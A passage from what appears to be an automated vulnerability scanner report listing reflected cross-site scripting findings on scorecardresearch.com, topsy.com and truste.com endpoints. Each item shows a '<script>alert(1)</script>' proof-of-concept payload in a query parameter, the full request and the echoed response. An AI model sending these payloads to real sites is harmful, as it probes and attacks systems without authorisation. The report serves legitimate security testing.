if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"6035094", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"92915<script>alert(1)</script>efbb621c20e", c16:"", r:""});
2.80. http://b.scorecardresearch.com/beacon.js [c2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 9dde8<script>alert(1)</script>7b980e7bea was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=60350949dde8<script>alert(1)</script>7b980e7bea&c3=&c4=&c5=&c6=&c15=&_=1305206872926 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://arstechnica.com/gadgets/news/2011/05/more-chromebooks-from-google-chrome-os-web-store-updates-too.ars
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 19 May 2011 13:27:54 GMT
Date: Thu, 12 May 2011 13:27:54 GMT
Connection: close
Content-Length: 3587

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"60350949dde8<script>alert(1)</script>7b980e7bea", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});
2.81. http://b.scorecardresearch.com/beacon.js [c3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload e4e1a<script>alert(1)</script>5bede08ec18 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=6035094&c3=e4e1a<script>alert(1)</script>5bede08ec18&c4=&c5=&c6=&c15=&_=1305206872926 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://arstechnica.com/gadgets/news/2011/05/more-chromebooks-from-google-chrome-os-web-store-updates-too.ars
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 19 May 2011 13:27:55 GMT
Date: Thu, 12 May 2011 13:27:55 GMT
Connection: close
Content-Length: 3588

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
ry{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"6035094", c3:"e4e1a<script>alert(1)</script>5bede08ec18", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});
2.82. http://b.scorecardresearch.com/beacon.js [c4 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload ff61b<script>alert(1)</script>190415549b6 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=6035094&c3=&c4=ff61b<script>alert(1)</script>190415549b6&c5=&c6=&c15=&_=1305206872926 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://arstechnica.com/gadgets/news/2011/05/more-chromebooks-from-google-chrome-os-web-store-updates-too.ars
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 19 May 2011 13:27:55 GMT
Date: Thu, 12 May 2011 13:27:55 GMT
Connection: close
Content-Length: 3588

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"6035094", c3:"", c4:"ff61b<script>alert(1)</script>190415549b6", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});
2.83. http://b.scorecardresearch.com/beacon.js [c5 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 96ad7<script>alert(1)</script>4047793bf11 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=6035094&c3=&c4=&c5=96ad7<script>alert(1)</script>4047793bf11&c6=&c15=&_=1305206872926 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://arstechnica.com/gadgets/news/2011/05/more-chromebooks-from-google-chrome-os-web-store-updates-too.ars
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 19 May 2011 13:27:55 GMT
Date: Thu, 12 May 2011 13:27:55 GMT
Connection: close
Content-Length: 3588

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"6035094", c3:"", c4:"", c5:"96ad7<script>alert(1)</script>4047793bf11", c6:"", c10:"", c15:"", c16:"", r:""});
2.84. http://b.scorecardresearch.com/beacon.js [c6 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 1ce64<script>alert(1)</script>e9a688821fa was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=6035094&c3=&c4=&c5=&c6=1ce64<script>alert(1)</script>e9a688821fa&c15=&_=1305206872926 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://arstechnica.com/gadgets/news/2011/05/more-chromebooks-from-google-chrome-os-web-store-updates-too.ars
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 19 May 2011 13:27:55 GMT
Date: Thu, 12 May 2011 13:27:55 GMT
Connection: close
Content-Length: 3588

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"2", c2:"6035094", c3:"", c4:"", c5:"", c6:"1ce64<script>alert(1)</script>e9a688821fa", c10:"", c15:"", c16:"", r:""});
2.85. http://button.topsy.com/widget/retweet-json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://button.topsy.com
Path:   /widget/retweet-json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 538ee<script>alert(1)</script>75c4880b403 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /widget/retweet-json?id=topsy_id1-3-1-7-1-1-20-3-1&url=http%3A%2F%2Fwww.gizmodo.com.au%2F2011%2F05%2Fgoogle-chrome-os-lands-on-hardware-you-can-actually-buy%2F&callback=topsyWidgetCallback538ee<script>alert(1)</script>75c4880b403 HTTP/1.1
Host: button.topsy.com
Proxy-Connection: keep-alive
Referer: http://www.gizmodo.com.au/2011/05/google-chrome-os-lands-on-hardware-you-can-actually-buy/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=5
Content-Type: application/javascript; charset=utf-8
Expires: Thu, 12 May 2011 13:33:04 GMT
Last-Modified: Thu, 12 May 2011 13:32:59 GMT
Server: lighttpd/1.4.26
Content-Length: 436
Date: Thu, 12 May 2011 13:32:59 GMT
X-Varnish: 1053771630
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Served-By: ps166
X-Cache: MISS

topsyWidgetCallback538ee<script>alert(1)</script>75c4880b403({ "html_id": "topsy_id1-3-1-7-1-1-20-3-1", "url": "http://www.gizmodo.com.au/2011/05/google-chrome-os-lands-on-hardware-you-can-actually-buy/", "count": "0", "badge": "", "trackback_url": "http://tops
...[SNIP]...

2.86. http://button.topsy.com/widget/retweet-json [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://button.topsy.com
Path:   /widget/retweet-json

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 1dcf9<script>alert(1)</script>6a054643f01 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /widget/retweet-json?id=topsy_id1-3-1-7-1-1-20-3-11dcf9<script>alert(1)</script>6a054643f01&url=http%3A%2F%2Fwww.gizmodo.com.au%2F2011%2F05%2Fgoogle-chrome-os-lands-on-hardware-you-can-actually-buy%2F&callback=topsyWidgetCallback HTTP/1.1
Host: button.topsy.com
Proxy-Connection: keep-alive
Referer: http://www.gizmodo.com.au/2011/05/google-chrome-os-lands-on-hardware-you-can-actually-buy/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=5
Content-Type: application/javascript; charset=utf-8
Expires: Thu, 12 May 2011 13:32:56 GMT
Last-Modified: Thu, 12 May 2011 13:32:51 GMT
Server: lighttpd/1.4.26
Content-Length: 436
Date: Thu, 12 May 2011 13:32:51 GMT
X-Varnish: 1053761882
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Served-By: ps166
X-Cache: MISS

topsyWidgetCallback({ "html_id": "topsy_id1-3-1-7-1-1-20-3-11dcf9<script>alert(1)</script>6a054643f01", "url": "http://www.gizmodo.com.au/2011/05/google-chrome-os-lands-on-hardware-you-can-actually-buy/", "count": "0", "badge": "", "trackback_url": "http://topsy.com/www.gizmodo.com.au/2011/05/google-c
...[SNIP]...

2.87. http://choices.truste.com/ca [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 68458<script>alert(1)</script>6f4e5e61299 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl300x250&c=att02cont168458<script>alert(1)</script>6f4e5e61299&w=300&h=250&ox=20&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286444146/direct;wi.300;hi.250/01?click=http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D13052070721588565-93912%26campID%3D90206%26crID%3D93912%26pubICode%3D2083508%26pub%3D369335%26partnerID%3D38%26redirectURL%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:19 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 4472

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
baseName] = bindings;
   }
}

   // prototypes
   String.prototype.equalsIgnoreCase = function(arg) {
       return (new String(this.toLowerCase()) == (new String(arg)).toLowerCase());
   }

   var te_clr1_att02cont168458<script>alert(1)</script>6f4e5e61299_ib = '<div id="te-clr1-att02cont168458<script>
...[SNIP]...

2.88. http://choices.truste.com/ca [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the h request parameter is copied into the HTML document as plain text between tags. The payload 41838<script>alert(1)</script>e9abb0011f3 was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl300x250&c=att02cont1&w=300&h=25041838<script>alert(1)</script>e9abb0011f3&ox=20&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286444146/direct;wi.300;hi.250/01?click=http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D13052070721588565-93912%26campID%3D90206%26crID%3D93912%26pubICode%3D2083508%26pub%3D369335%26partnerID%3D38%26redirectURL%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:19 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 4122

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</div> \
\
';

   var te_clr1_att02cont1_bi = {'baseName':'te-clr1-att02cont1','anchName':'te-clr1-att02cont1-anch','width':300,'height':25041838<script>alert(1)</script>e9abb0011f3,'ox':20,'oy':0,'plc':'tr','iplc':'ctr','intDivName':'te-clr1-att02cont1-itl','iconSpanId':'te-clr1-att02cont1-icon','backgroundColor':'white','opacity':.8,'filterOpacity':80,'containerId':'att02cont1'
...[SNIP]...

2.89. http://choices.truste.com/ca [iplc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the iplc request parameter is copied into the HTML document as plain text between tags. The payload e9290<script>alert(1)</script>e98193a566a was submitted in the iplc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl300x250&c=att02cont1&w=300&h=250&ox=20&zi=10002&plc=tr&iplc=ctre9290<script>alert(1)</script>e98193a566a HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286444146/direct;wi.300;hi.250/01?click=http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D13052070721588565-93912%26campID%3D90206%26crID%3D93912%26pubICode%3D2083508%26pub%3D369335%26partnerID%3D38%26redirectURL%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:20 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 3980

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</div>\
';

   var te_clr1_att02cont1_bi = {'baseName':'te-clr1-att02cont1','anchName':'te-clr1-att02cont1-anch','width':300,'height':250,'ox':20,'oy':0,'plc':'tr','iplc':'ctre9290<script>alert(1)</script>e98193a566a','intDivName':'te-clr1-att02cont1-itl','iconSpanId':'te-clr1-att02cont1-icon','backgroundColor':'white','opacity':.8,'filterOpacity':80,'containerId':'att02cont1','noticeBaseUrl':'http://choices.trust
...[SNIP]...

2.90. http://choices.truste.com/ca [ox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the ox request parameter is copied into the HTML document as plain text between tags. The payload 1e2fc<script>alert(1)</script>485c4866fa1 was submitted in the ox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl300x250&c=att02cont1&w=300&h=250&ox=201e2fc<script>alert(1)</script>485c4866fa1&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286444146/direct;wi.300;hi.250/01?click=http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D13052070721588565-93912%26campID%3D90206%26crID%3D93912%26pubICode%3D2083508%26pub%3D369335%26partnerID%3D38%26redirectURL%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:19 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 3980

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</div>\
';

   var te_clr1_att02cont1_bi = {'baseName':'te-clr1-att02cont1','anchName':'te-clr1-att02cont1-anch','width':300,'height':250,'ox':201e2fc<script>alert(1)</script>485c4866fa1,'oy':0,'plc':'tr','iplc':'ctr','intDivName':'te-clr1-att02cont1-itl','iconSpanId':'te-clr1-att02cont1-icon','backgroundColor':'white','opacity':.8,'filterOpacity':80,'containerId':'att02cont1','notice
...[SNIP]...

2.91. http://choices.truste.com/ca [plc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the plc request parameter is copied into the HTML document as plain text between tags. The payload 3dfbb<script>alert(1)</script>3f1c606171d was submitted in the plc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl300x250&c=att02cont1&w=300&h=250&ox=20&zi=10002&plc=tr3dfbb<script>alert(1)</script>3f1c606171d&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286444146/direct;wi.300;hi.250/01?click=http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D13052070721588565-93912%26campID%3D90206%26crID%3D93912%26pubICode%3D2083508%26pub%3D369335%26partnerID%3D38%26redirectURL%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:20 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 3980

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</div>\
';

   var te_clr1_att02cont1_bi = {'baseName':'te-clr1-att02cont1','anchName':'te-clr1-att02cont1-anch','width':300,'height':250,'ox':20,'oy':0,'plc':'tr3dfbb<script>alert(1)</script>3f1c606171d','iplc':'ctr','intDivName':'te-clr1-att02cont1-itl','iconSpanId':'te-clr1-att02cont1-icon','backgroundColor':'white','opacity':.8,'filterOpacity':80,'containerId':'att02cont1','noticeBaseUrl':'http://
...[SNIP]...

2.92. http://choices.truste.com/ca [w parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the w request parameter is copied into the HTML document as plain text between tags. The payload 5c2d2<script>alert(1)</script>33523cd489b was submitted in the w parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl300x250&c=att02cont1&w=3005c2d2<script>alert(1)</script>33523cd489b&h=250&ox=20&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286444146/direct;wi.300;hi.250/01?click=http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D13052070721588565-93912%26campID%3D90206%26crID%3D93912%26pubICode%3D2083508%26pub%3D369335%26partnerID%3D38%26redirectURL%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:19 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 4122

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</div> \
\
';

   var te_clr1_att02cont1_bi = {'baseName':'te-clr1-att02cont1','anchName':'te-clr1-att02cont1-anch','width':3005c2d2<script>alert(1)</script>33523cd489b,'height':250,'ox':20,'oy':0,'plc':'tr','iplc':'ctr','intDivName':'te-clr1-att02cont1-itl','iconSpanId':'te-clr1-att02cont1-icon','backgroundColor':'white','opacity':.8,'filterOpacity':80,'containerId'
...[SNIP]...

2.93. http://choices.truste.com/ca [zi parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the zi request parameter is copied into the HTML document as plain text between tags. The payload 5710e<script>alert(1)</script>ce869b4fe74 was submitted in the zi parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl300x250&c=att02cont1&w=300&h=250&ox=20&zi=100025710e<script>alert(1)</script>ce869b4fe74&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/286444146/direct;wi.300;hi.250/01?click=http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D13052070721588565-93912%26campID%3D90206%26crID%3D93912%26pubICode%3D2083508%26pub%3D369335%26partnerID%3D38%26redirectURL%3D
